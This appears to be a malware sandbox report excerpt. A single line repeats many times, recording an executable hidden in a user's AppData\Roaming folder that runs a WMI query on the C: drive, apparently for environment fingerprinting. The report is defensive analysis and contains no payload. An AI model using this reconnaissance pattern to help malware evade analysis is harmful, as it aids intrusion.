                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
